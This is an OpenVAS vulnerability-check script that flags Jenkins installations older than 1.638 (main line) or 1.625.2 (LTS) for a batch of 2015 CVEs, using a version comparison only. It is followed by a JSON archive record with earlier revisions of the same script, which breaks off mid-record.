ID OPENVAS:1361412562310808269 Type openvas Reporter Copyright (C) 2016 Greenbone Networks GmbH Modified 2019-10-17T00:00:00
Description
Jenkins is installed on this host and is prone to multiple vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
#
# Jenkins Multiple Vulnerabilities - Nov15 (Linux)
#
# Authors:
# Rinu Kuriakose <krinu@secpod.com>
#
# Copyright:
# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# CPE under which the Jenkins detection result is looked up by
# get_app_port() / get_app_full() in the check further down.
CPE = "cpe:/a:jenkins:jenkins";
# Metadata registration. This branch only declares what the check is about
# and ends with exit(0), so none of the version logic below runs in it.
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.808269");
script_version("2019-10-17T11:27:19+0000");
# All CVEs covered by this one version comparison. The check does not tell
# them apart: a host is reported for the whole set or for none of it.
script_cve_id("CVE-2015-5317", "CVE-2015-5318", "CVE-2015-5319", "CVE-2015-5320",
"CVE-2015-5321", "CVE-2015-5322", "CVE-2015-5323", "CVE-2015-5324",
"CVE-2015-5325", "CVE-2015-5326", "CVE-2015-8103", "CVE-2015-7536",
"CVE-2015-7537", "CVE-2015-7538", "CVE-2015-7539");
script_bugtraq_id(77572, 77570, 77574, 77636, 77619);
# One CVSS v2 base score and vector for the whole batch.
# NOTE(review): individual CVEs in the list may be rated differently;
# confirm per CVE before using this value for prioritisation.
script_tag(name:"cvss_base", value:"7.6");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:H/Au:N/C:C/I:C/A:C");
script_tag(name:"last_modification", value:"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)");
script_tag(name:"creation_date", value:"2016-08-05 09:47:29 +0530 (Fri, 05 Aug 2016)");
script_name("Jenkins Multiple Vulnerabilities - Nov15 (Linux)");
script_tag(name:"summary", value:"This host is installed with
Jenkins and is prone to multiple vulnerabilities.");
# Detection method: a comparison of the detected version string only; no
# request exercising any of the flaws is made by this script.
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
# Short description of the flaw classes. The list has fewer entries than
# script_cve_id() above, so it is a summary and not a one-to-one mapping.
script_tag(name:"insight", value:"Multiple flaws are due to,
- An error in 'Fingerprints' pages.
- The usage of publicly accessible salt to generate CSRF protection tokens.
- The XML external entity (XXE) vulnerability in the create-job CLI command.
- An improper verification of the shared secret used in JNLP slave
connections.
- An error in sidepanel widgets in the CLI command overview and help
pages.
- The directory traversal vulnerability in while requesting jnlpJars.
- An improper restriction on access to API tokens.
- The cross-site scripting vulnerability in the slave overview page.
- The unsafe deserialization in Jenkins remoting.");
script_tag(name:"impact", value:"Successful exploitation will allow remote
attackers to obtain sensitive information, bypass the protection mechanism,
gain elevated privileges, bypass intended access restrictions and execute
arbitrary code.");
# Affected and fixed releases are stated separately for the main line and
# the LTS line; the check below uses the same two fixed versions.
script_tag(name:"affected", value:"All Jenkins main line releases up to and including 1.637,
all Jenkins LTS releases up to and including 1.625.1.");
script_tag(name:"solution", value:"Jenkins main line users should update to 1.638,
Jenkins LTS users should update to 1.625.2.");
script_tag(name:"solution_type", value:"VendorFix");
# Quality of detection: the result rests on a remotely observed version
# string that the tag itself classes as unreliable.
# NOTE(review): a version-only check cannot see fixes backported into a
# distribution package; treat a hit as a lead to confirm on the host.
script_tag(name:"qod_type", value:"remote_banner_unreliable");
script_xref(name:"URL", value:"https://jenkins.io/security/advisory/2015-11-11/");
script_xref(name:"URL", value:"https://jenkins.io/blog/2015/11/06/mitigating-unauthenticated-remote-code-execution-0-day-in-jenkins-cli/");
script_xref(name:"URL", value:"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2016 Greenbone Networks GmbH");
script_family("Web application abuses");
# Scheduling constraints: the two named scripts run first, and this check
# is only started when both knowledge-base keys are present, i.e. Jenkins
# was detected and the host was classified as Unix-like.
script_dependencies("gb_jenkins_consolidation.nasl", "os_detection.nasl");
script_mandatory_keys("jenkins/detected", "Host/runs_unixoide");
exit(0);
}
include("host_details.inc");
include("version_func.inc");
# Version check: report the host when the detected Jenkins version is older
# than the fixed release of its release line (LTS or main line).

# Port of the Jenkins instance recorded for this CPE; nothing to do without one.
port = get_app_port(cpe:CPE);
if(!port)
  exit(0);

# Full detection record for that port (version, install location, protocol).
infos = get_app_full(cpe:CPE, port:port);
if(!infos)
  exit(0);

# No version string means no comparison is possible; leave without a result.
version = infos["version"];
if(!version)
  exit(0);

location = infos["location"];
proto = infos["proto"];

# Choose the fixed release to compare against. The knowledge-base key
# "jenkins/<port>/is_lts" decides which release line the instance is on.
# NOTE(review): when that key is absent for an LTS install, the version is
# compared against the main-line fix, so a patched LTS 1.625.2 would still
# compare as older than 1.638 and be reported. Verify how the detection
# script sets is_lts before relying on a finding for an LTS host.
if(get_kb_item("jenkins/" + port + "/is_lts"))
  fix = "1.625.2";
else
  fix = "1.638";

if(version_is_less(version:version, test_version:fix)) {
  report = report_fixed_ver(installed_version:version, fixed_version:fix, install_path:location);
  security_message(port:port, data:report, proto:proto);
  exit(0);
}

# Reached only when the version is at or above the fixed release; 99 is the
# exit code these scripts use for "checked and not affected" (confirm against
# the scanner documentation).
exit(99);
{"id": "OPENVAS:1361412562310808269", "bulletinFamily": "scanner", "title": "Jenkins Multiple Vulnerabilities - Nov15 (Linux)", "description": "This host is installed with\n Jenkins and is prone to multiple vulnerabilities.", "published": "2016-08-05T00:00:00", "modified": "2019-10-17T00:00:00", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808269", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["https://jenkins.io/blog/2015/11/06/mitigating-unauthenticated-remote-code-execution-0-day-in-jenkins-cli/", "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability", "https://jenkins.io/security/advisory/2015-11-11/"], "cvelist": ["CVE-2015-5323", "CVE-2015-7537", "CVE-2015-7536", "CVE-2015-7539", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5317", "CVE-2015-5321", "CVE-2015-5320", "CVE-2015-5318", "CVE-2015-5326", "CVE-2015-5325", "CVE-2015-8103"], "type": "openvas", "lastseen": "2019-10-18T15:24:34", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2015-5323", "CVE-2015-7537", "CVE-2015-7536", "CVE-2015-7539", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5317", "CVE-2015-5321", "CVE-2015-5320", "CVE-2015-5318", "CVE-2015-5326", "CVE-2015-5325", "CVE-2015-8103"], "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "description": "This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.", "edition": 12, "enchantments": {"dependencies": {"modified": "2019-10-16T21:23:49", "references": [{"idList": ["1337DAY-ID-24727"], "type": "zdt"}, {"idList": ["CVE-2015-5323", "CVE-2015-7537", "CVE-2015-7536", "CVE-2015-7539", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5326", "CVE-2015-5325"], "type": "cve"}, {"idList": 
["JENKINS_CLI_DESERIALIZATION"], "type": "canvas"}, {"idList": ["REDHAT-RHSA-2016-0489.NASL", "FEDORA_2015-D7E5461DBF.NASL", "REDHAT-RHSA-2016-0070.NASL", "JENKINS_SECURITY218.NASL"], "type": "nessus"}, {"idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B"], "type": "pentestit"}, {"idList": ["ASA-201511-11"], "type": "archlinux"}, {"idList": ["OPENVAS:1361412562310806621", "OPENVAS:1361412562310131309", "OPENVAS:1361412562310105820", "OPENVAS:1361412562310806920", "OPENVAS:1361412562310807001"], "type": "openvas"}, {"idList": ["PACKETSTORM:134805"], "type": "packetstorm"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/JENKINS_COMMAND", "MSF:EXPLOIT/LINUX/MISC/JENKINS_JAVA_DESERIALIZE", "MSF:EXPLOIT/LINUX/MISC/OPENNMS_JAVA_SERIALIZE"], "type": "metasploit"}, {"idList": ["EDB-ID:38983"], "type": "exploitdb"}, {"idList": ["KITPLOIT:5230099254245458698"], "type": "kitploit"}, {"idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7"], "type": "impervablog"}, {"idList": ["RHSA-2016:0070", "RHSA-2016:22381", "RHSA-2016:0489"], "type": "redhat"}, {"idList": ["VU:576313"], "type": "cert"}]}, "score": {"modified": "2019-10-16T21:23:49", "value": 7.2, "vector": "NONE"}}, "hash": "8490401c1573a14200a8497d66c78c64962b84bfdb4e9edff601d8b4a99d71a1", "hashmap": [{"hash": "ed80408f65b06df34ed6dfdb743af507", "key": "cvss"}, {"hash": "dd9b4b24b1a373330409187d442ddec2", "key": "title"}, {"hash": "80701cd55b5ac06d1d43d62fdc11c554", "key": "cvelist"}, {"hash": "9c347b2bb345bb324195d4843abd9088", "key": "sourceData"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "51576b010aab228499057cea5ee65aa4", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a97d31368d124ea1d4cd3a47fe743758", "key": "published"}, {"hash": "97be7ad8dd311237bb296ca09a9add56", "key": "pluginID"}, {"hash": "e294c4a0771d09c68982383a48ce342f", "key": "modified"}, {"hash": 
"fb77f3a2d7d21df49ec9de4b6f393ef2", "key": "href"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "ed06e36139fd2ab4cabbb1d532f7f40d", "key": "description"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808269", "id": "OPENVAS:1361412562310808269", "lastseen": "2019-10-16T21:23:49", "modified": "2019-10-15T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310808269", "published": "2016-08-05T00:00:00", "references": ["https://jenkins.io/blog/2015/11/06/mitigating-unauthenticated-remote-code-execution-0-day-in-jenkins-cli/", "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability", "https://jenkins.io/security/advisory/2015-11-11/"], "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CloudBees Jenkins Multiple Vulnerabilities - Nov15 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808269\");\n script_version(\"2019-10-15T07:48:22+0000\");\n script_cve_id(\"CVE-2015-5317\", \"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\",\n \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5324\",\n \"CVE-2015-5325\", \"CVE-2015-5326\", \"CVE-2015-8103\", \"CVE-2015-7536\",\n \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\");\n script_bugtraq_id(77572, 77570, 77574, 77636, 77619);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-15 07:48:22 +0000 (Tue, 15 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-08-05 09:47:29 +0530 (Fri, 05 Aug 2016)\");\n\n script_name(\"CloudBees Jenkins Multiple Vulnerabilities - Nov15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error in 'Fingerprints' pages.\n\n - The usage of publicly accessible salt to generate CSRF protection tokens.\n\n - The XML external entity (XXE) vulnerability in the create-job CLI command.\n\n - An improper verification of the shared secret used in JNLP slave\n connections.\n\n - An error in sidepanel widgets in the CLI command overview and help\n pages.\n\n - The directory traversal vulnerability in 
while requesting jnlpJars.\n\n - An improper restriction on access to API tokens.\n\n - The cross-site scripting vulnerability in the slave overview page.\n\n - The unsafe deserialization in Jenkins remoting.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to obtain sensitive information, bypass the protection mechanism,\n gain elevated privileges, bypass intended access restrictions and execute\n arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"All Jenkins main line releases up to and including 1.637,\n all Jenkins LTS releases up to and including 1.625.1.\");\n\n script_tag(name:\"solution\", value:\"Jenkins main line users should update to 1.638,\n Jenkins LTS users should update to 1.625.2.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2015-11-11/\");\n script_xref(name:\"URL\", value:\"https://jenkins.io/blog/2015/11/06/mitigating-unauthenticated-remote-code-execution-0-day-in-jenkins-cli/\");\n script_xref(name:\"URL\", value:\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_unixoide\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_full(cpe:CPE, port:port))\n exit(0);\n\nif(!version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif(get_kb_item(\"jenkins/\" + port + \"/is_lts\")) {\n 
if(version_is_less(version:version, test_version:\"1.625.2\")) {\n vuln = TRUE;\n fix = \"1.625.2\";\n }\n} else {\n if(version_is_less(version:version, test_version:\"1.638\")) {\n vuln = TRUE;\n fix = \"1.638\";\n }\n}\n\nif(vuln) {\n report = report_fixed_ver(installed_version:version, fixed_version:fix, install_path:location);\n security_message(port:port, data:report, proto:proto);\n exit(0);\n}\n\nexit(99);\n", "title": "CloudBees Jenkins Multiple Vulnerabilities - Nov15 (Linux)", "type": "openvas", "viewCount": 4}, "differentElements": ["description", "modified", "sourceData", "title"], "edition": 12, "lastseen": "2019-10-16T21:23:49"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2015-5323", "CVE-2015-7537", "CVE-2015-7536", "CVE-2015-7539", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5317", "CVE-2015-5321", "CVE-2015-5320", "CVE-2015-5318", "CVE-2015-5326", "CVE-2015-5325", "CVE-2015-8103"], "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.", "edition": 2, "enchantments": {"score": {"modified": "2017-10-25T14:43:07", "value": 5.4, "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:P/"}}, "hash": "dbc92e93a2dfa407f530914c4fb3a907243b93f723207008f85273a1c5c52301", "hashmap": [{"hash": "3fe6ba291639126bca60f0b96e757310", "key": "title"}, {"hash": "c5bb34af05c207ad0795b24b339835fb", "key": "modified"}, {"hash": "80701cd55b5ac06d1d43d62fdc11c554", "key": "cvelist"}, {"hash": "774fce555a963c00be305187dd6dff95", "key": "cvss"}, {"hash": "6c224556d4ac4c7795c0812479c6af87", "key": "sourceData"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a97d31368d124ea1d4cd3a47fe743758", "key": "published"}, {"hash": 
"84ac25ec4d8bb0a7c2e92f90d42d6e57", "key": "references"}, {"hash": "97be7ad8dd311237bb296ca09a9add56", "key": "pluginID"}, {"hash": "fb77f3a2d7d21df49ec9de4b6f393ef2", "key": "href"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "ed06e36139fd2ab4cabbb1d532f7f40d", "key": "description"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808269", "id": "OPENVAS:1361412562310808269", "lastseen": "2017-10-25T14:43:07", "modified": "2017-10-24T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310808269", "published": "2016-08-05T00:00:00", "references": ["https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11"], "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cloudbees_jenkins_mult_vuln_aug16_lin.nasl 7545 2017-10-24 11:45:30Z cfischer $\n#\n# CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cloudbees:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808269\");\n script_version(\"$Revision: 7545 $\");\n script_cve_id(\"CVE-2015-5317\", \"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\",\n \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5324\",\n \"CVE-2015-5325\", \"CVE-2015-5326\", \"CVE-2015-8103\", \"CVE-2015-7536\",\n \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\");\n script_bugtraq_id(77572, 77570, 77574, 77636, 77619);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 13:45:30 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-05 09:47:29 +0530 (Fri, 05 Aug 2016)\");\n script_name(\"CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Get the installed version with the help of\n detect NVT and check the version is vulnerable or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n - An error in 'Fingerprints' pages.\n - The usage of publicly accessible salt to generate CSRF protection tokens.\n - The XML external entity (XXE) vulnerability in the create-job CLI command.\n - An improper verification of the shared secret used in JNLP slave\n connections.\n - An error in sidepanel widgets in the CLI command overview and help\n pages.\n - The directory 
traversal vulnerability in while requesting jnlpJars.\n - An Improper restriction on access to API tokens.\n - The cross-site scripting vulnerability in the slave overview page.\n - The unsafe deserialization in Jenkins remoting.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to obtain sensitive informaion, bypass the protection mechanism,\n gain elevated privileges, bypass intended access restrictions and execute\n arbitrary code.\n\n Impact Level: Application\");\n\n script_tag(name:\"affected\", value:\"CloudBees Jenkins LTS before 1.625.2\n on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to CloudBees Jenkins LTS 1.625.2 or\n later. For more updates refer to https://www.cloudbees.com\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name : \"URL\" , value : \"https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"sw_jenkins_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/installed\",\"Host/runs_unixoide\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\n\n## Code starts from here\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n## Variable Initialization\njenkinPort = \"\";\njenkinVer= \"\";\n\n## Get HTTP Port\nif(!jenkinPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\n# Get Version\nif(!jenkinVer = get_app_version(cpe:CPE, port:jenkinPort)){\n exit(0);\n}\n\n## Check for vulnerable version\nif(version_is_less(version:jenkinVer, test_version:\"1.625.2\"))\n{\n report = report_fixed_ver(installed_version:jenkinVer, fixed_version:\"1.625.2\");\n security_message(data:report, port:jenkinPort);\n exit(0);\n}\n", "title": "CloudBees 
Jenkins Multiple Vulnerabilities August16 (Linux)", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-25T14:43:07"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2015-5323", "CVE-2015-7537", "CVE-2015-7536", "CVE-2015-7539", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5317", "CVE-2015-5321", "CVE-2015-5320", "CVE-2015-5318", "CVE-2015-5326", "CVE-2015-5325", "CVE-2015-8103"], "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "description": "This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.", "edition": 11, "enchantments": {"dependencies": {"modified": "2019-07-30T14:17:44", "references": [{"idList": ["1337DAY-ID-24727"], "type": "zdt"}, {"idList": ["CVE-2015-5323", "CVE-2015-7537", "CVE-2015-7536", "CVE-2015-7539", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5326", "CVE-2015-5325"], "type": "cve"}, {"idList": ["JENKINS_CLI_DESERIALIZATION"], "type": "canvas"}, {"idList": ["REDHAT-RHSA-2016-0489.NASL", "FEDORA_2015-D7E5461DBF.NASL", "REDHAT-RHSA-2016-0070.NASL", "JENKINS_SECURITY218.NASL"], "type": "nessus"}, {"idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B"], "type": "pentestit"}, {"idList": ["ASA-201511-11"], "type": "archlinux"}, {"idList": ["OPENVAS:1361412562310806621", "OPENVAS:1361412562310131309", "OPENVAS:1361412562310105820", "OPENVAS:1361412562310806920", "OPENVAS:1361412562310807001"], "type": "openvas"}, {"idList": ["PACKETSTORM:134805"], "type": "packetstorm"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/JENKINS_COMMAND", "MSF:EXPLOIT/LINUX/MISC/JENKINS_JAVA_DESERIALIZE", "MSF:EXPLOIT/LINUX/MISC/OPENNMS_JAVA_SERIALIZE"], "type": "metasploit"}, {"idList": ["EDB-ID:38983"], "type": "exploitdb"}, {"idList": ["KITPLOIT:5230099254245458698"], "type": "kitploit"}, {"idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7"], "type": "impervablog"}, 
{"idList": ["RHSA-2016:0070", "RHSA-2016:22381", "RHSA-2016:0489"], "type": "redhat"}, {"idList": ["VU:576313"], "type": "cert"}]}, "score": {"modified": "2019-07-30T14:17:44", "value": 7.3, "vector": "NONE"}}, "hash": "9b610dcb15ec75e18bbfea8a87f428c19515a9c5253cbf9d003d1b25d0ff7e35", "hashmap": [{"hash": "3fe6ba291639126bca60f0b96e757310", "key": "title"}, {"hash": "ed80408f65b06df34ed6dfdb743af507", "key": "cvss"}, {"hash": "80701cd55b5ac06d1d43d62fdc11c554", "key": "cvelist"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a97d31368d124ea1d4cd3a47fe743758", "key": "published"}, {"hash": "84ac25ec4d8bb0a7c2e92f90d42d6e57", "key": "references"}, {"hash": "0cd4cd199638d4a2757220727b1edc2b", "key": "sourceData"}, {"hash": "97be7ad8dd311237bb296ca09a9add56", "key": "pluginID"}, {"hash": "9e2752354f7c58639c937a2a09780049", "key": "modified"}, {"hash": "fb77f3a2d7d21df49ec9de4b6f393ef2", "key": "href"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "ed06e36139fd2ab4cabbb1d532f7f40d", "key": "description"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808269", "id": "OPENVAS:1361412562310808269", "lastseen": "2019-07-30T14:17:44", "modified": "2019-07-30T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310808269", "published": "2016-08-05T00:00:00", "references": ["https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11"], "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks 
GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808269\");\n script_version(\"2019-07-30T03:00:13+0000\");\n script_cve_id(\"CVE-2015-5317\", \"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\",\n \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5324\",\n \"CVE-2015-5325\", \"CVE-2015-5326\", \"CVE-2015-8103\", \"CVE-2015-7536\",\n \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\");\n script_bugtraq_id(77572, 77570, 77574, 77636, 77619);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-30 03:00:13 +0000 (Tue, 30 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-08-05 09:47:29 +0530 (Fri, 05 Aug 2016)\");\n\n script_name(\"CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", 
